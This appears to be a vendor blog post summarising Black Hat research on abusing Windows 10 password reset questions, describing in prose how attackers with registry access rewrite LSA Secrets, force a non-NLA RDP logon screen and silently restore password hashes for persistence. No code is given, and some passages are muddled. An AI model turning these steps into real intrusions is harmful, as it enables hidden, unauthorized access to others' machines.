The security questions are designed by Microsoft to help people get out of trouble when they forget their password. They are very useful sometimes. Today, my focus will be put on Windows 10 password reset questions.
Security questions are widely used in all Windows versions to help people with password forgetting problem.
Yet, things have been changed recently. The famous companies like Google and Facebook start to give up security questions after realizing something. The reasons why they are doing so may be difficult for ordinary users to understand, but they are easy for hackers.
Here, I am going to dive into the Windows 10 password reset questions. Hope this could help you clear your mind.
Set Windows 10 Password Reset Questions Remotely
Recently, the researchers of Black Hat Crafty infosec have found a way to set answers to Windows 10’s password reset questions remotely and easily. The astonishing news is that – they have not even executed any code on the targeted device.
Microsoft account unlock becomes much easier than before by adding security key and Windows Hello as login method.
Magal Baz and Tom Sela, from Illusive Networks, said it’s an easy task for them to do the following things due to the combination of a simple Python script and some alarmingly straightforward registry tweaks:
- Define the password reset answers remotely.
- Restore the password changes of local users.
Ordinary Users Can’t Change the Security Questions
The fact is that the password reset questions in Windows 10 are actually hard-coded. That is to say, you are not allowed to define password reset questions for your devices; you have no choice but to choose one of the six questions that Microsoft has provided for users. Those six questions are now working on to help you prevent your box from getting intruding.
Therefore, suitable account privileges are required if you want to configure the password reset questions. Only the attacker who has already got the access to your network can take advantage of it to provide persistence (which is nearly invisible) on the local machines so as to resist attempts to shut them out.
The Windows registry stores many items in the well-known LSA Secrets entry, including:
- Local machine
- Passwords of the service users
Information like this is expected to be secret and secure enough that even the step-by-step Powershell guides are provided in the Microsoft Technet bloggers for the sake of examining the contents, which are actually encrypted.
If files get lost from a BitLocker encrypted hard drive, you can recover them by following this:
If you are trying to perform a BitLocker drive encryption recovery, you can read this post to recover lost data from BitLocker encrypted hard drives.
How to Make It Possible to Define Password Reset Questions
Yet, there’s one way to settle this down. To figure out how it’s encrypted, you must understand one thing: the artefacts from the registry on that machine should be collected to assemble the AES key that the LSA secrets are encrypted with.
As a result, under the condition that you can get full access to the registry on a certain machine, you can get the key easily and use it to rewrite the LSA Secrets on your own.
The Working Process
- You will see a standard Windows logon screen after initializing a remote desktop session to the target machine. If you’re careful enough, you’ll find there’s no reset password button.
- Now, if you force the remote desktop session to roll back to the non-network level authentication, you can actually bypass the security protection.
- By telling the server you do not support NLA, you, as a RDP client, can ask it to offer the old Windows logon screen (with a password reset option) to you. That’s how Magal Baz and Tom Sela build an RDP file containing the appropriate flag set.
- You will be able to check the persistence one you get the access to the standard password reset screen. If only the password is changed by suspicious user, the local access won’t be available; yet, things will be totally different if you have the ability to restore that password to the one you have already known.
- The hashes of the old passwords will be stored by Windows under AES in the registry to stop people reusing their old passwords. So you can read them easily once you get full access to the registry.
- Thus, it’s easy for you to adopt a new API and restore the active hash before it is changed.
In fact, you are changing a password on the target machine, but no one is going to notice this.